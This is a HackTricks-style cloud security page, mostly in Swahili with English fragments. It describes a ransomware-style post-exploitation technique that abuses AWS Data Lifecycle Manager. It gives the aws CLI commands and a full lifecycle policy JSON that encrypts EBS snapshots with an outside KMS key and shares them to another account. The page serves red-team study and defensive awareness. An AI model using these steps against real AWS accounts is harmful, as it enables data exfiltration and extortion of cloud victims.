AWS - DLM Post Exploitation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Data Lifecycle Manger (DLM)

`EC2:DescribeVolumes`, `DLM:CreateLifeCyclePolicy`

Shambulio la ransomware linaweza kutekelezwa kwa kuficha kiasi kikubwa cha EBS volumes na kisha kufuta EC2 instances, EBS volumes, na snapshots za sasa. Ili kuendesha shughuli hii mbaya, mtu anaweza kutumia Amazon DLM, akificha snapshots kwa kutumia KMS key kutoka akaunti nyingine ya AWS na kuhamasisha snapshots zilizofichwa kwa akaunti tofauti. Vinginevyo, wanaweza kuhamasisha snapshots bila kuficha kwa akaunti wanayosimamia na kisha kuzificha huko. Ingawa si rahisi kuficha EBS volumes au snapshots zilizopo moja kwa moja, inawezekana kufanya hivyo kwa kuunda volume au snapshot mpya.

Kwanza, mtu atatumia amri kukusanya taarifa kuhusu volumes, kama vile instance ID, volume ID, hali ya ufichaji, hali ya kiambatisho, na aina ya volume.

aws ec2 describe-volumes

Pili, mtu ataunda sera ya mzunguko wa maisha. Amri hii inatumia DLM API kuanzisha sera ya mzunguko wa maisha ambayo kiotomatiki inachukua snapshots za kila siku za volumes zilizotajwa kwa wakati maalum. Pia inatumia lebo maalum kwa snapshots na nakala za lebo kutoka kwa volumes hadi snapshots. Faili ya policyDetails.json inajumuisha maelezo ya sera ya mzunguko wa maisha, kama vile lebo za lengo, ratiba, ARN ya KMS key ya hiari kwa ajili ya ufichaji, na akaunti ya lengo kwa ajili ya kushiriki snapshots, ambayo itarekodiwa katika kumbukumbu za CloudTrail za mwathirika.

aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json

A template for the policy document can be seen here: Kiole la hati ya sera linaweza kuonekana hapa:

{
"PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
"ResourceTypes": [
"VOLUME"
],
"TargetTags": [
{
"Key": "ExampleKey",
"Value": "ExampleValue"
}
],
"Schedules": [
{
"Name": "DailySnapshots",
"CopyTags": true,
"TagsToAdd": [
{
"Key": "SnapshotCreator",
"Value": "DLM"
}
],
"VariableTags": [
{
"Key": "CostCenter",
"Value": "Finance"
}
],
"CreateRule": {
"Interval": 24,
"IntervalUnit": "HOURS",
"Times": [
"03:00"
]
},
"RetainRule": {
"Count": 14
},
"FastRestoreRule": {
"Count": 2,
"Interval": 12,
"IntervalUnit": "HOURS"
},
"CrossRegionCopyRules": [
{
"TargetRegion": "us-west-2",
"Encrypted": true,
"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
"CopyTags": true,
"RetainRule": {
"Interval": 1,
"IntervalUnit": "DAYS"
}
}
],
"ShareRules": [
{
"TargetAccounts": [
"123456789012"
],
"UnshareInterval": 30,
"UnshareIntervalUnit": "DAYS"
}
]
}
],
"Parameters": {
"ExcludeBootVolume": false
}
}

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the mpango ya usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

PreviousAWS - Control Tower Post Exploitation NextAWS - DynamoDB Post Exploitation

Last updated 1 month ago

Data Lifecycle Manger (DLM)

EC2:DescribeVolumes, DLM:CreateLifeCyclePolicy

`EC2:DescribeVolumes`, `DLM:CreateLifeCyclePolicy`